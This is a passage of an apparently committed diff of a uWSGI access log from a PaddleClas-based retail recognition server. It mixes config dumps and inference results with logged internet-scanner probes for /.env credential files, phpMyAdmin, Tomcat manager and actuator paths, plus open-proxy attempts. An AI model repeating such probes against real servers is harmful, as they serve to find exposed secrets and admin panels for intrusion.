2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 585/689] 103.207.42.166 () {36 vars in 590 bytes} [Sun Feb 6 12:04:51 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 586/690] 103.207.42.166 () {40 vars in 697 bytes} [Sun Feb 6 12:04:59 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 587/691] 83.97.20.34 () {26 vars in 286 bytes} [Sun Feb 6 12:35:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 588/692] 128.1.248.42 () {34 vars in 486 bytes} [Sun Feb 6 13:25:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 589/693] 35.195.93.98 () {42 vars in 562 bytes} [Sun Feb 6 13:34:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 590/694] 109.237.103.9 () {36 vars in 523 bytes} [Sun Feb 6 13:55:10 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 591/695] 2.57.121.44 () {34 vars in 400 bytes} [Sun Feb 6 14:19:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 592/696] 39.98.234.140 () {30 vars in 369 bytes} [Sun Feb 6 14:35:03 2022] HEAD /phpMyAdmin4.8.5/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 593/697] 45.95.169.102 () {40 vars in 567 bytes} [Sun Feb 6 14:53:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 594/698] 2.57.121.44 () {34 vars in 400 bytes} [Sun Feb 6 16:44:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 595/699] 89.165.69.195 () {36 vars in 521 bytes} [Sun Feb 6 16:49:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 596/700] 35.87.25.248 () {36 vars in 522 bytes} [Sun Feb 6 16:55:04 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 63/701] 35.87.25.248 () {40 vars in 629 bytes} [Sun Feb 6 16:55:05 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 597/702] 109.237.103.123 () {36 vars in 525 bytes} [Sun Feb 6 17:17:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 598/703] 109.237.103.118 () {36 vars in 525 bytes} [Sun Feb 6 17:50:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 599/704] 162.142.125.221 () {28 vars in 312 bytes} [Sun Feb 6 18:13:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 600/705] 162.142.125.221 () {34 vars in 444 bytes} [Sun Feb 6 18:13:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 601/706] 162.221.192.26 () {34 vars in 488 bytes} [Sun Feb 6 19:00:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 602/707] 164.90.197.46 () {32 vars in 439 bytes} [Sun Feb 6 19:11:26 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 603/708] 2.136.26.43 () {30 vars in 434 bytes} [Sun Feb 6 19:37:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 604/709] 181.143.64.122 () {32 vars in 464 bytes} [Sun Feb 6 19:53:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 605/710] 159.203.82.92 () {22 vars in 232 bytes} [Sun Feb 6 20:14:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 606/711] 192.241.206.152 () {34 vars in 429 bytes} [Sun Feb 6 21:20:19 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 45.87.212.180 client_port: 39480] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 607/712] 47.103.4.170 () {34 vars in 458 bytes} [Sun Feb 6 21:41:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 608/713] 209.17.97.122 () {30 vars in 410 bytes} [Sun Feb 6 22:11:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 609/714] 40.71.60.51 () {36 vars in 521 bytes} [Sun Feb 6 22:50:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 610/715] 40.71.60.51 () {40 vars in 628 bytes} [Sun Feb 6 22:50:22 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 611/716] 40.71.60.51 () {36 vars in 521 bytes} [Sun Feb 6 23:15:27 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 612/717] 40.71.60.51 () {40 vars in 628 bytes} [Sun Feb 6 23:15:28 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 613/718] 192.241.212.182 () {34 vars in 419 bytes} [Mon Feb 7 00:09:33 2022] GET /manager/html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 614/719] 222.186.59.201 () {30 vars in 524 bytes} [Mon Feb 7 00:15:25 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 615/720] 222.186.59.201 () {30 vars in 502 bytes} [Mon Feb 7 00:15:25 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 616/721] 23.251.102.74 () {34 vars in 487 bytes} [Mon Feb 7 00:26:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 617/722] 47.101.52.66 () {34 vars in 425 bytes} [Mon Feb 7 00:39:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 618/723] 109.237.103.38 () {36 vars in 524 bytes} [Mon Feb 7 00:50:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 619/724] 47.101.40.67 () {34 vars in 425 bytes} [Mon Feb 7 01:36:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 620/725] 198.16.62.18 () {28 vars in 383 bytes} [Mon Feb 7 01:39:53 2022] GET http://fuwu.sogou.com/404/index.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 621/726] 162.142.125.221 () {30 vars in 402 bytes} [Mon Feb 7 02:47:29 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 622/727] 162.142.125.221 () {22 vars in 235 bytes} [Mon Feb 7 02:47:29 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 64/728] 162.142.125.220 () {34 vars in 444 bytes} [Mon Feb 7 02:50:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 623/729] 136.144.41.117 () {40 vars in 568 bytes} [Mon Feb 7 03:30:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 624/730] 52.53.215.162 () {34 vars in 499 bytes} [Mon Feb 7 04:04:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 625/731] 148.72.172.24 () {34 vars in 436 bytes} [Mon Feb 7 05:24:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 626/732] 192.241.209.104 () {34 vars in 423 bytes} [Mon Feb 7 05:25:45 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 627/733] 192.241.208.88 () {34 vars in 424 bytes} [Mon Feb 7 06:05:27 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 628/734] 36.5.197.231 () {32 vars in 476 bytes} [Mon Feb 7 06:32:18 2022] GET http://wujieliulan.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 629/735] 36.5.197.231 () {32 vars in 476 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.minghui.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 2/736] 36.5.197.231 () {32 vars in 484 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.epochtimes.com/ => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 3/737] 36.5.197.231 () {32 vars in 469 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.boxun.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 630/738] 36.5.197.231 () {32 vars in 465 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.bing.com/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 631/739] 36.5.197.231 () {32 vars in 473 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.123cha.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 632/740] 36.5.197.231 () {32 vars in 470 bytes} [Mon Feb 7 06:32:18 2022] GET http://www.baidu.com/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 4/741] 36.5.197.231 () {22 vars in 273 bytes} [Mon Feb 7 06:32:19 2022] CONNECT www.voanews.com:443 => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 2/742] 36.5.197.231 () {32 vars in 463 bytes} [Mon Feb 7 06:32:25 2022] GET http://www.rfa.org/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 633/743] 136.144.41.117 () {40 vars in 568 bytes} [Mon Feb 7 07:08:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 634/744] 101.251.238.53 () {32 vars in 618 bytes} [Mon Feb 7 07:25:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 635/745] 128.14.134.134 () {34 vars in 488 bytes} [Mon Feb 7 07:40:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 636/746] 47.103.22.60 () {34 vars in 430 bytes} [Mon Feb 7 08:35:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 637/747] 112.231.159.160 () {34 vars in 432 bytes} [Mon Feb 7 08:52:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-07 09:17:04 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-07 09:17:04 INFO: DetPostProcess : +2022-02-07 09:17:04 INFO: DetPreProcess : +2022-02-07 09:17:04 INFO: transform_ops : +2022-02-07 09:17:04 INFO: DetResize : +2022-02-07 09:17:04 INFO: interp : 2 +2022-02-07 09:17:04 INFO: keep_ratio : False +2022-02-07 09:17:04 INFO: target_size : [640, 640] +2022-02-07 09:17:04 INFO: DetNormalizeImage : +2022-02-07 09:17:04 INFO: is_scale : True +2022-02-07 09:17:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:04 INFO: DetPermute : +2022-02-07 09:17:04 INFO: Global : +2022-02-07 09:17:04 INFO: batch_size : 1 +2022-02-07 09:17:04 INFO: cpu_num_threads : 1 +2022-02-07 09:17:04 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-07 09:17:04 INFO: enable_benchmark : True +2022-02-07 09:17:04 INFO: enable_mkldnn : True +2022-02-07 09:17:04 INFO: enable_profile : False +2022-02-07 09:17:04 INFO: gpu_mem : 8000 +2022-02-07 09:17:04 INFO: image_shape : [3, 640, 640] +2022-02-07 09:17:04 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-07 09:17:04 INFO: ir_optim : True +2022-02-07 09:17:04 INFO: labe_list : ['foreground'] +2022-02-07 09:17:04 INFO: max_det_results : 5 +2022-02-07 09:17:04 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-07 09:17:04 INFO: rec_nms_thresold : 0.05 +2022-02-07 09:17:04 INFO: threshold : 0.2 +2022-02-07 09:17:04 INFO: use_fp16 : False +2022-02-07 09:17:04 INFO: use_gpu : False +2022-02-07 09:17:04 INFO: use_tensorrt : False +2022-02-07 09:17:04 INFO: IndexProcess : +2022-02-07 09:17:04 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-07 09:17:04 INFO: return_k : 5 +2022-02-07 09:17:04 INFO: score_thres : 0.5 +2022-02-07 09:17:04 INFO: RecPostProcess : None +2022-02-07 09:17:04 INFO: RecPreProcess : +2022-02-07 09:17:04 INFO: transform_ops : +2022-02-07 09:17:04 INFO: ResizeImage : +2022-02-07 09:17:04 INFO: size : 224 +2022-02-07 09:17:04 INFO: NormalizeImage : +2022-02-07 09:17:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:04 INFO: order : +2022-02-07 09:17:04 INFO: scale : 0.00392157 +2022-02-07 09:17:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:04 INFO: ToCHWImage : None +Inference: 378.16524505615234 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 8/14] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:01:37 2021] POST /reference_client/ => generated 98 bytes in 5710 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +[pid: 19148|app: 0|req: 638/748] 58.213.200.39 () {34 vars in 446 bytes} [Mon Feb 7 09:17:03 2022] POST /reference_client/ => generated 98 bytes in 2791 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) req -2021-11-03 04:02:32 INFO: +2022-02-07 09:17:55 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1954,75 +3794,144 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:02:32 INFO: DetPostProcess : -2021-11-03 04:02:32 INFO: DetPreProcess : -2021-11-03 04:02:32 INFO: transform_ops : -2021-11-03 04:02:32 INFO: DetResize : -2021-11-03 04:02:32 INFO: interp : 2 -2021-11-03 04:02:32 INFO: keep_ratio : False -2021-11-03 04:02:32 INFO: target_size : [640, 640] -2021-11-03 04:02:32 INFO: DetNormalizeImage : -2021-11-03 04:02:32 INFO: is_scale : True -2021-11-03 04:02:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:32 INFO: DetPermute : -2021-11-03 04:02:32 INFO: Global : -2021-11-03 04:02:32 INFO: batch_size : 1 -2021-11-03 04:02:32 INFO: cpu_num_threads : 10 -2021-11-03 04:02:32 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:02:32 INFO: enable_benchmark : True -2021-11-03 04:02:32 INFO: enable_mkldnn : True -2021-11-03 04:02:32 INFO: enable_profile : False -2021-11-03 04:02:32 INFO: gpu_mem : 8000 -2021-11-03 04:02:32 INFO: image_shape : [3, 640, 640] -2021-11-03 04:02:32 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:02:32 INFO: ir_optim : True -2021-11-03 04:02:32 INFO: labe_list : ['foreground'] -2021-11-03 04:02:32 INFO: max_det_results : 5 -2021-11-03 04:02:32 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:02:32 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:02:32 INFO: threshold : 0.2 -2021-11-03 04:02:32 INFO: use_fp16 : False -2021-11-03 04:02:32 INFO: use_gpu : False -2021-11-03 04:02:32 INFO: use_tensorrt : False -2021-11-03 04:02:32 INFO: IndexProcess : -2021-11-03 04:02:32 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:02:32 INFO: return_k : 5 -2021-11-03 04:02:32 INFO: score_thres : 0.5 -2021-11-03 04:02:32 INFO: RecPostProcess : None -2021-11-03 04:02:32 INFO: RecPreProcess : -2021-11-03 04:02:32 INFO: transform_ops : -2021-11-03 04:02:32 INFO: ResizeImage : -2021-11-03 04:02:32 INFO: size : 224 -2021-11-03 04:02:32 INFO: NormalizeImage : -2021-11-03 04:02:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:32 INFO: order : -2021-11-03 04:02:32 INFO: scale : 0.00392157 -2021-11-03 04:02:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:32 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2397.6428508758545 ms per batch image +2022-02-07 09:17:55 INFO: DetPostProcess : +2022-02-07 09:17:55 INFO: DetPreProcess : +2022-02-07 09:17:55 INFO: transform_ops : +2022-02-07 09:17:55 INFO: DetResize : +2022-02-07 09:17:55 INFO: interp : 2 +2022-02-07 09:17:55 INFO: keep_ratio : False +2022-02-07 09:17:55 INFO: target_size : [640, 640] +2022-02-07 09:17:55 INFO: DetNormalizeImage : +2022-02-07 09:17:55 INFO: is_scale : True +2022-02-07 09:17:55 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:55 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:55 INFO: DetPermute : +2022-02-07 09:17:55 INFO: Global : +2022-02-07 09:17:55 INFO: batch_size : 1 +2022-02-07 09:17:55 INFO: cpu_num_threads : 1 +2022-02-07 09:17:55 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-07 09:17:55 INFO: enable_benchmark : True +2022-02-07 09:17:55 INFO: enable_mkldnn : True +2022-02-07 09:17:55 INFO: enable_profile : False +2022-02-07 09:17:55 INFO: gpu_mem : 8000 +2022-02-07 09:17:55 INFO: image_shape : [3, 640, 640] +2022-02-07 09:17:55 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-07 09:17:55 INFO: ir_optim : True +2022-02-07 09:17:55 INFO: labe_list : ['foreground'] +2022-02-07 09:17:55 INFO: max_det_results : 5 +2022-02-07 09:17:55 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-07 09:17:55 INFO: rec_nms_thresold : 0.05 +2022-02-07 09:17:55 INFO: threshold : 0.2 +2022-02-07 09:17:55 INFO: use_fp16 : False +2022-02-07 09:17:55 INFO: use_gpu : False +2022-02-07 09:17:55 INFO: use_tensorrt : False +2022-02-07 09:17:55 INFO: IndexProcess : +2022-02-07 09:17:55 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-07 09:17:55 INFO: return_k : 5 +2022-02-07 09:17:55 INFO: score_thres : 0.5 +2022-02-07 09:17:55 INFO: RecPostProcess : None +2022-02-07 09:17:55 INFO: RecPreProcess : +2022-02-07 09:17:55 INFO: transform_ops : +2022-02-07 09:17:55 INFO: ResizeImage : +2022-02-07 09:17:55 INFO: size : 224 +2022-02-07 09:17:55 INFO: NormalizeImage : +2022-02-07 09:17:55 INFO: mean : [0.485, 0.456, 0.406] +2022-02-07 09:17:55 INFO: order : +2022-02-07 09:17:55 INFO: scale : 0.00392157 +2022-02-07 09:17:55 INFO: std : [0.229, 0.224, 0.225] +2022-02-07 09:17:55 INFO: ToCHWImage : None +Inference: 373.920202255249 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 6/15] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:02:31 2021] POST /reference_client/ => generated 98 bytes in 6321 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +[pid: 19148|app: 0|req: 639/749] 58.213.200.39 () {34 vars in 446 bytes} [Mon Feb 7 09:17:54 2022] POST /reference_client/ => generated 98 bytes in 2764 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 640/750] 64.62.197.92 () {28 vars in 306 bytes} [Mon Feb 7 09:33:31 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 65/751] 128.14.209.170 () {34 vars in 488 bytes} [Mon Feb 7 09:35:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 641/752] 47.101.52.174 () {34 vars in 431 bytes} [Mon Feb 7 10:36:13 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 642/753] 8.142.31.126 () {38 vars in 678 bytes} [Mon Feb 7 11:09:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 643/754] 8.142.31.126 () {30 vars in 355 bytes} [Mon Feb 7 11:09:09 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 644/755] 8.142.31.126 () {30 vars in 353 bytes} [Mon Feb 7 11:09:09 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 645/756] 167.71.1.54 () {36 vars in 479 bytes} [Mon Feb 7 11:20:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 646/757] 103.203.56.1 () {34 vars in 388 bytes} [Mon Feb 7 11:32:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 647/758] 130.211.54.158 () {42 vars in 564 bytes} [Mon Feb 7 13:06:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 648/759] 158.181.131.81 () {32 vars in 465 bytes} [Mon Feb 7 13:07:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 649/760] 212.154.7.246 () {36 vars in 523 bytes} [Mon Feb 7 13:20:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 650/761] 212.154.7.246 () {40 vars in 630 bytes} [Mon Feb 7 13:20:52 2022] POST / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 651/762] 154.159.246.176 () {32 vars in 472 bytes} [Mon Feb 7 13:23:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 652/763] 103.47.217.141 () {32 vars in 464 bytes} [Mon Feb 7 14:11:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 653/764] 167.94.146.58 () {28 vars in 310 bytes} [Mon Feb 7 14:35:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 654/765] 167.94.146.58 () {34 vars in 442 bytes} [Mon Feb 7 14:35:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 655/766] 192.241.209.10 () {34 vars in 394 bytes} [Mon Feb 7 15:11:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 656/767] 8.142.16.239 () {24 vars in 259 bytes} [Mon Feb 7 15:11:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 657/768] 103.207.42.166 () {36 vars in 590 bytes} [Mon Feb 7 15:11:48 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 658/769] 8.142.16.239 () {34 vars in 636 bytes} [Mon Feb 7 15:11:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 